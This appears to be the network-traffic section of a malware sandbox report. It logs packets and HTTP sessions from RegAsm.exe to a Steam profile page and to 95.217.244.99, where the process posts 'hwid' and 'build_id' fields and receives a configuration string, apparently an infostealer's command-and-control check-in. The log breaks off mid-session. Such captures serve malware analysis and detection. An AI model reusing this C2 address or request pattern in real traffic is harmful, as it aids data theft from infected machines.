                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.878844023 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.878865957 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.878887892 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.878912926 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.980411053 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.980447054 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.980490923 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.980514050 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.980531931 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:21.980554104 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.042182922 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.042278051 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.042319059 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.042454958 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.042454958 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.043334007 CEST49725443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.043354034 CEST4434972595.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.417218924 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.417309999 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.417417049 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.417720079 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.417752981 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.850475073 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.850591898 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.851360083 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.851372004 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.851629972 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:22.851635933 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.677542925 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.677575111 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.677627087 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.677660942 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.677680016 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.677715063 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.678034067 CEST49726443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.678076982 CEST4434972695.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.681304932 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.681349039 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.681423903 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.681678057 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:23.681689024 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:24.149348021 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:24.149506092 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:24.150197983 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:24.150208950 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:24.150438070 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:24.150443077 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.018163919 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.018260956 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.018280029 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.018309116 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.018502951 CEST49727443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.018518925 CEST4434972795.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.035526991 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.035571098 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.035657883 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.035933018 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.035944939 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.504137993 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.504302025 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.504899979 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.504928112 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.505137920 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:25.505142927 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:26.364973068 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:26.365067959 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:26.365123987 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:26.365281105 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:26.398821115 CEST49728443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:26.398845911 CEST4434972895.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:27.142393112 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:27.142441034 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:27.142522097 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:27.142998934 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:27.143016100 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:27.575754881 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:27.575908899 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.959867954 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.959908962 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960095882 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960110903 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960189104 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960201025 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960207939 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960211992 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960239887 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960246086 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960335970 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960350037 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960371017 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960378885 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960407019 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960412025 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960475922 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960525036 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960558891 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960577965 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960652113 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960665941 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960724115 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.960860968 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:28.961020947 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.670851946 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.670964956 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.671076059 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.671369076 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.671369076 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.675590992 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.675693035 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.675791025 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.676016092 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.676054955 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.983994007 CEST49729443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:30.984034061 CEST4434972995.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.111653090 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.111742973 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.112407923 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.112464905 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.112631083 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.112646103 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.952150106 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.952245951 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.952425957 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.952425957 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.952675104 CEST49730443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.952703953 CEST4434973095.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.954699039 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.954737902 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.954818010 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.955064058 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:31.955073118 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:32.387017965 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:32.387074947 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:32.387650967 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:32.387656927 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:32.387840986 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:32.387845039 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:33.233505011 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:33.233587027 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:33.233597040 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:33.233659029 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:33.233891964 CEST49731443192.168.2.695.217.244.99
                                                                                                                                                                                                                                      Apr 23, 2024 21:44:33.233911037 CEST4434973195.217.244.99192.168.2.6
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.701896906 CEST6386353192.168.2.61.1.1.1
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.806906939 CEST53638631.1.1.1192.168.2.6
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.701896906 CEST192.168.2.61.1.1.10xd540Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Apr 23, 2024 21:43:55.806906939 CEST1.1.1.1192.168.2.60xd540No error (0)steamcommunity.com23.47.27.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                      • 95.217.244.99
                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.64969923.47.27.744432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:43:56 UTC119OUTGET /profiles/76561199677575543 HTTP/1.1
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:43:56 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:43:56 GMT
                                                                                                                                                                                                                                      Content-Length: 33800
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=9ce6bb0c33a1c9c8edaf7039; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C514997ac8292ce85a02847656e86f088; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2024-04-23 19:43:56 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                      2024-04-23 19:43:56 UTC10062INData Raw: 6f 77 6e 20 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6c 69 6e 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0d 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09
                                                                                                                                                                                                                                      Data Ascii: own global_action_link" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                      2024-04-23 19:43:56 UTC9224INData Raw: 74 6e 65 72 2e 73 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49
                                                                                                                                                                                                                                      Data Ascii: tner.steamgames.com\/&quot;,&quot;STATS_BASE_URL&quot;:&quot;https:\/\/partner.steampowered.com\/&quot;,&quot;INTERNAL_STATS_BASE_URL&quot;:&quot;https:\/\/steamstats.valve.org\/&quot;,&quot;IN_CLIENT&quot;:false,&quot;USE_POPUPS&quot;:false,&quot;STORE_I


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.64970195.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:43:57 UTC170OUTGET / HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:43:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:43:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:43:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      2192.168.2.64970595.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:43:58 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 279
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:43:58 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 46 31 41 37 33 42 43 33 37 43 33 31 32 39 31 33 31 31 31 33 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 4b 4a 4b 45 48 44 42 47 48 49 44 48 49 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                      Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="hwid"3F1A73BC37C31291311131-a33c7340-61ca-11ee-8c18-806e6f6e6963------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------
                                                                                                                                                                                                                                      2024-04-23 19:43:59 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:43:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:43:59 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 3a1|1|1|0|9523aa6635b02b25d330f210dd9827bb|1|1|1|0|0|50000|00


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      3192.168.2.64970895.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:43:59 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
